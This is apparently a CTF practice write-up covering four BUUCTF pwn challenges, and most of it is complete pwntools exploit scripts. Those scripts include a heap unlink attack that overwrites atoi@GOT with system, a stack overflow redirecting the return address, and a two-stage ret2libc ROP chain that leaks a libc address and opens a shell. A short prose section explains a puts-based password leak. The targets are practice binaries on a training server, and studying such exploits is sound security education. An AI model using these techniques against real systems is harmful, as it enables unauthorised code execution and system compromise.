PWN-PRACTICE-BUUCTF-22
- hitcontraining_unlink
- picoctf_2018_leak_me
- suctf_2018_basic pwn
- axb_2019_brop64
hitcontraining_unlink
unlink,参考:[BUUCTF]PWN——hitcontraining_unlink
# -*- coding:utf-8 -*-
from pwn import *
# Connection and binaries for the hitcontraining_unlink (bamboobox) exercise.
# The local-process line stays commented out so the script can be flipped back
# to a local run when debugging; the remote is the BUUCTF practice node.
# io = process("./bamboobox")
io = remote("node4.buuoj.cn", 25178)
elf = ELF("./bamboobox")
# libc build that matches the remote instance (used for symbol offsets below).
libc = ELF("./libc-2.23-16-x64.so")


def show():
    """Send menu option 1 (the program's 'show' action) to the target."""
    io.sendlineafter("Your choice:", "1")
def add(name_len, name):
    """Send menu option 2: create an item with the given length and name.

    Args:
        name_len: value answered to the "length of item name" prompt.
        name: bytes/str answered to the "name of item" prompt.
    """
    dialogue = (
        ("Your choice:", "2"),
        ("the length of item name:", str(name_len)),
        ("the name of item:", name),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def edit(index, name_len, name):
    """Send menu option 3: overwrite item `index` with `name_len` bytes of `name`.

    The program reads the length from the caller, so a length larger than the
    original allocation is what makes the heap overflow in the main script possible.
    """
    dialogue = (
        ("Your choice:", "3"),
        ("the index of item:", str(index)),
        ("the length of item name:", str(name_len)),
        ("the new name of the item:", name),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def free(index):
    """Send menu option 4: release the item at position `index`."""
    dialogue = (
        ("Your choice:", "4"),
        ("the index of item:", str(index)),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def exit():
    """Send menu option 5 (the program's exit action).

    NOTE: this shadows the builtin ``exit``; the name is kept so existing
    call sites keep working, but do not rely on the builtin in this module.
    """
    io.sendlineafter("Your choice:", "5")


# gdb.attach(io)
# pause()
# Three items: the first is the one that gets overflowed, the second is the
# chunk that is freed to trigger the unlink, the third keeps the second from
# merging into the top chunk.
add(0x40, "aaaa")
add(0x80, "bbbb")
add(0x80, "cccc")
# pause()
# Fixed address (binary is non-PIE) — presumably the global slot holding the
# item pointer; fd/bk are placed relative to it so the allocator's unlink
# pointer-consistency check accepts the fake chunk.
ptr = 0x00000000006020C8
fake_fd, fake_bk = ptr - 0x18, ptr - 0x10

# Fake chunk header (prev_size, size, fd, bk), padded to the 0x40 item size,
# followed by the next chunk's header fields (prev_size 0x40, size 0x90 with
# PREV_INUSE clear) so the free below consolidates backwards.
payload = p64(0) + p64(0x40) + p64(fake_fd) + p64(fake_bk)
payload = payload.ljust(0x40, "A")
payload += p64(0x40) + p64(0x90)
edit(0, len(payload), payload)
# pause()
free(1)
# pause()

# After the unlink, item 0's pointer refers into the pointer table itself,
# so an edit of item 0 rewrites the table; item 0 is pointed at atoi@GOT.
atoi_got = elf.got["atoi"]
payload = p64(0) * 2 + p64(0x40) + p64(atoi_got)
edit(0, len(payload), payload)
# pause()

# Leak: showing item 0 now prints the GOT entry, i.e. atoi's libc address.
# This works because the GOT is writable/readable here (presumably partial
# RELRO); full RELRO would leave no writable GOT to redirect.
show()
io.recvuntil("0 : ")
leaked = io.recv(6).ljust(8, "\x00")
atoi_addr = u64(leaked)
print("atoi_addr==" + hex(atoi_addr))

libc_base = atoi_addr - libc.sym["atoi"]
system = libc_base + libc.sym["system"]
# pause()
# Redirect atoi to system; the next menu "choice" string is passed to it.
edit(0, 0x08, p64(system))
# pause()
io.sendlineafter("Your choice:", "/bin/sh\x00")
io.interactive()
picoctf_2018_leak_me
v5字符数组大小为256,在后面高地址处跟着的是s字符数组,程序会读取password.txt到s
后面有一句puts(v5),puts遇到"\x00"才会停止打印
将v5的256个字符全部填充为"a",没有回车"\n",就不会在结尾设置"\x00"
puts(v5)的时候就可以将password打印出来
再次nc到服务器,输入正确的密码即可得到flag
suctf_2018_basic pwn
栈溢出
from pwn import *
# io = process('./SUCTF_2018_basic_pwn')
io = remote('node4.buuoj.cn', 26502)

# Return-address overwrite to a fixed in-binary address (non-PIE target).
# 0x110 + 8 bytes of filler reach the saved return address — presumably the
# buffer plus the saved frame pointer; the offset comes from the challenge
# binary, not from anything computed here.
flag_addr = 0x401157
filler = 'a' * (0x110 + 8)
payload = filler + p64(flag_addr)
io.sendline(payload)
io.interactive()
axb_2019_brop64
栈溢出,ret2libc
from pwn import *
# Verbose pwntools logging makes the two-stage exchange below easy to follow.
context.log_level = "debug"
# io = process('./axb_2019_brop64')
io = remote('node4.buuoj.cn', 29347)
elf = ELF('./axb_2019_brop64')
# libc build matching the remote instance; only used for symbol offsets.
libc = ELF('./libc-2.23-x64.so')

# Fixed addresses: the binary is non-PIE, so main, PLT and GOT are static.
main = 0x4007d6
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
# `pop rdi; ret` gadget at a fixed address (non-PIE binary).
pop_rdi = 0x400963

# Stage 1: overflow the stack buffer, call puts(puts@GOT) to leak a libc
# address, then return to main so the same overflow can be used again.
io.recvuntil('Please tell me:')
leak_chain = p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
payload = 'a' * (0xd0 + 8) + leak_chain
io.sendline(payload)

# The leaked pointer is the 6 low bytes ending in 0x7f (typical for an
# x86-64 libc mapping); pad to 8 bytes before unpacking.
leaked = io.recvuntil('\x7f')[-6:]
puts_addr = u64(leaked.ljust(8, '\x00'))
libc_base = puts_addr - libc.sym['puts']
system = libc_base + libc.sym['system']
# `.next()` is the Python 2 iterator API; the whole script assumes Python 2
# pwntools (string payloads, str.ljust with a str filler).
binsh = libc_base + libc.search('/bin/sh\x00').next()

# Stage 2: same overflow (0xd8 == 0xd0 + 8), this time returning into
# system("/bin/sh") with a ret back to main afterwards.
io.recvuntil('Please tell me:')
shell_chain = p64(pop_rdi) + p64(binsh) + p64(system) + p64(main)
payload = 'a' * 0xd8 + shell_chain
io.sendline(payload)
io.interactive()